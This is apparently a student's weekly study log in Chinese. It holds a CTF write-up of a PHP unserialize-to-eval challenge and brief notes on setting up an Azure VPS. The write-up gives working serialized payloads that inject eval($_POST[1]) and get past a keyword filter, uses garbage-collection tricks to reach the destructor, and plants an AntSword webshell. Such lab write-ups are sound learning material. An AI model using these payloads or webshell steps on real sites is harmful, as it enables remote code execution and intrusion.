<a name="WZyeA"></a>
# 本周内容：继续学习php
1.GC垃圾回收<br />2.记录一下VPS的搭建
<a name="TocPQ"></a>
# 成果展示：
<a name="ajZrg"></a>
## 1.remove
是一道GC垃圾回收机制题目
```php
<?php
  highlight_file(__FILE__);
class syc{
  public $lover;
  public function __destruct()
  {
    eval($this->lover);
  }
}

if(isset($_GET['web'])){
  if(!preg_match('/lover/i',$_GET['web'])){
    $a=unserialize($_GET['web']);
    throw new Error("快来玩快来玩~");
  }
  else{
    echo("nonono");
  }
}
  ?>
```
首先是lover的绕过：<br />使用S的类型后面加十六进制，把lover换成16进制即可<br />这道题有很多种解法
<a name="Ue9ro"></a>
### 执行函数
<a name="FrL7y"></a>
#### 解法1：造成错误触发垃圾回收
正常构造pop链：<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698755880916-3a8098c6-8c38-40c3-a4eb-39c46712e578.png#averageHue=%23232222&clientId=u72760c9e-7a6b-4&from=paste&height=745&id=uaa57878c&originHeight=745&originWidth=1899&originalType=binary&ratio=1&rotation=0&showTitle=false&size=152876&status=done&style=none&taskId=u8a275e31-b39a-4cd7-9082-af9b92ed38f&title=&width=1899)<br />替换lover：
```php
?web=O:3:"syc":1:{S:5:"\6c\6f\76\65\72";s:16:"eval($_POST[1]);";}
```
然后删掉最后一个}造成错误<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698756002396-3d839af1-7a2d-4710-9dca-8f26b4a4c247.png#averageHue=%23af895a&clientId=u72760c9e-7a6b-4&from=paste&height=431&id=u51e23b79&originHeight=1408&originWidth=2568&originalType=binary&ratio=1&rotation=0&showTitle=false&size=419666&status=done&style=none&taskId=uee16d996-9da3-4944-bec1-91de8d29c65&title=&width=786)<br />可以看到可以正常执行<br />同理，可以制造其他错误导致问题产生
```php
web=O:3:"syc":3:{S:5:"\6c\6f\76\65\72";s:16:"eval($_POST[1]);";}
```
![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698756204040-5f73ba77-214b-42f0-bd6f-af9622701ed0.png#averageHue=%23bd9562&clientId=u72760c9e-7a6b-4&from=paste&height=354&id=u1e877b73&originHeight=620&originWidth=2438&originalType=binary&ratio=1&rotation=0&showTitle=false&size=175141&status=done&style=none&taskId=ud6210ae5-a3d5-4475-af66-cc692167324&title=&width=1393.142857142857)<br />这个是制造了syc的参数数量的错误导致问题产生<br />同样可以导致gc产生
<a name="FhOdx"></a>
#### 解法2：返回null触发垃圾回收
![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698756559261-5011b784-de93-46ee-8ce9-ad4c32fc9cc6.png#averageHue=%23222221&clientId=u72760c9e-7a6b-4&from=paste&height=319&id=u61ebc264&originHeight=559&originWidth=1786&originalType=binary&ratio=1&rotation=0&showTitle=false&size=108443&status=done&style=none&taskId=ud724b70d-3c19-4c26-9af8-e47ae4e2b92&title=&width=1020.5714285714286)<br />这是使用了一个数组创造了一个null的键，两个索引一个指向对象一个指向null<br />这个也可以触发GC，需要把后面指向对象的索引改为指向null，这样我的理解是：垃圾处理程序认为是一个未被使用的参数，调用__destruct()，可以继续执行<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698756904659-3815ff0e-f11f-4113-8cd5-d142aee9854d.png#averageHue=%23c8a972&clientId=u72760c9e-7a6b-4&from=paste&height=289&id=ud3f5c4fa&originHeight=505&originWidth=2102&originalType=binary&ratio=1&rotation=0&showTitle=false&size=128143&status=done&style=none&taskId=u34155ce7-b75f-4ff7-af5a-c901c740777&title=&width=1201.142857142857)
<a name="bqSGj"></a>
### 绕过禁用函数
在phpinfo()中可以看到<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698757332519-5727baf9-964d-4640-819c-5b57dc29d040.png#averageHue=%23567c47&clientId=u72760c9e-7a6b-4&from=paste&height=38&id=u3d066e5c&originHeight=66&originWidth=1253&originalType=binary&ratio=1&rotation=0&showTitle=false&size=12768&status=done&style=none&taskId=u69e603c6-edfe-4db8-b3f1-de62fafa4eb&title=&width=716)<br />禁用了大多数能执行的函数<br />我们可以利用蚁剑<br />在传的pop链中构造一句话木马<br />因为原来的eval函数只能由pop链触发，蚁剑不支持，所以我们需要在lover的参数中再构造一次eval<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698757844943-edaa4599-50c3-4d98-8667-df2133d29755.png#averageHue=%23232222&clientId=u72760c9e-7a6b-4&from=paste&height=374&id=u8ede92d6&originHeight=655&originWidth=1425&originalType=binary&ratio=1&rotation=0&showTitle=false&size=108686&status=done&style=none&taskId=u4f469499-7f61-412d-989a-c82f2043f11&title=&width=814.2857142857143)<br />这里会报错，而且post并没有写进去，因为php把$_POST当成参数了，我们需要转义一下这个符号<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698757905651-994f67e6-fc41-4fe4-82e2-468072518f0e.png#averageHue=%23242323&clientId=u72760c9e-7a6b-4&from=paste&height=436&id=u2dd25b5d&originHeight=763&originWidth=1646&originalType=binary&ratio=1&rotation=0&showTitle=false&size=147412&status=done&style=none&taskId=u802a9b8e-20a6-4d01-a2e5-d705755fccb&title=&width=940.5714285714286)<br />这样就好了，把他换成十六进制就可以放在蚁剑里面了<br />但是在连蚁剑的时候又遇到了一些问题<br />就是蚁剑不能直接连接https<br />经过指点才知道http直接连接就可以<br />然后在蚁剑中发现flag，但是打开是空文件，但是这个文件是有大小的<br />所以就在终端中用base64打开<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698758769380-1a9156b5-d177-4c12-8975-87e68fb1a6eb.png#averageHue=%233f3a3a&clientId=u72760c9e-7a6b-4&from=paste&height=27&id=uacfd0ce3&originHeight=47&originWidth=318&originalType=binary&ratio=1&rotation=0&showTitle=false&size=3874&status=done&style=none&taskId=u4d815fa4-6456-4df7-8d6b-b5de0311a57&title=&width=181.71428571428572)就可以读出来了
<a name="pbAyf"></a>
### 总结
在这道题中学了很多新东西<br />1.反序列化字符串的绕过，可以用S代替s，然后将字符串转换成16进制即可，16进制之间要用\分隔开<br />2.由于php的垃圾清除机制，所以在传输的pop链中有unset()，出现错误,或是对象为NULL时会触发__destuct()再次执行，并且会跳过throw new error，从而执行eval<br />3.蚁剑连接不能使用https，flag可能藏在文件的base64中<br />4.$后面的字符可能会被当成参数，需要用\转义
<a name="GBdPE"></a>
## 2.VPS搭建
厂商选择用azure的免费服务器<br />第一步：先去中信银行用熟练的话术办一张VISA卡<br />之前有FSU的edu邮箱，已经用完了，现在用VISA卡免费200刀和12月服务器搭<br />第二步：直接开服务器<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698936562158-69f421c6-34a3-4fbe-b399-361c376dac6d.png#averageHue=%23fcfcfb&clientId=u78f6855a-27f8-4&from=paste&height=805&id=uf8d98095&originHeight=1408&originWidth=2568&originalType=binary&ratio=1.75&rotation=0&showTitle=false&size=345241&status=done&style=none&taskId=u964a48f8-ec63-445e-9b96-e99141a790d&title=&width=1467.4285714285713)<br />开完服务器之后就是开nsg，配置动态ip，ddns之类的，绑定一个域名（买了十年的waterbucket.fun）<br />安装宝塔面板方便运维<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698936676229-5235ed17-b57b-45f6-bdb4-ff05f05713c3.png#averageHue=%23032759&clientId=u78f6855a-27f8-4&from=paste&height=422&id=u4d5e1d90&originHeight=739&originWidth=873&originalType=binary&ratio=1.75&rotation=0&showTitle=false&size=89932&status=done&style=none&taskId=ua475754d-9027-4b30-8142-7d3dd8b945d&title=&width=498.85714285714283)<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698936750125-17587975-ab9d-4ee3-ba0f-6fe3bc2aba55.png#averageHue=%23fbf9f9&clientId=u78f6855a-27f8-4&from=paste&height=805&id=uc82983f4&originHeight=1408&originWidth=2568&originalType=binary&ratio=1.75&rotation=0&showTitle=false&size=289483&status=done&style=none&taskId=u286d8505-b497-4dff-b1bc-62fdad23a08&title=&width=1467.4285714285713)<br />关闭WAF，部署一下网站服务器，方便后面部署docker<br />azure唯一的缺点是延迟太大，没有国内服务器，但是他不限制出入口带宽是国内没有厂商比得上的（除了按量付费）<br />这个没什么踩坑的地方，因为之前玩VPS的时候都踩过坑：（现在就不用踩了<br />下一步是准备试着部署一下ctfd学学靶场的搭建
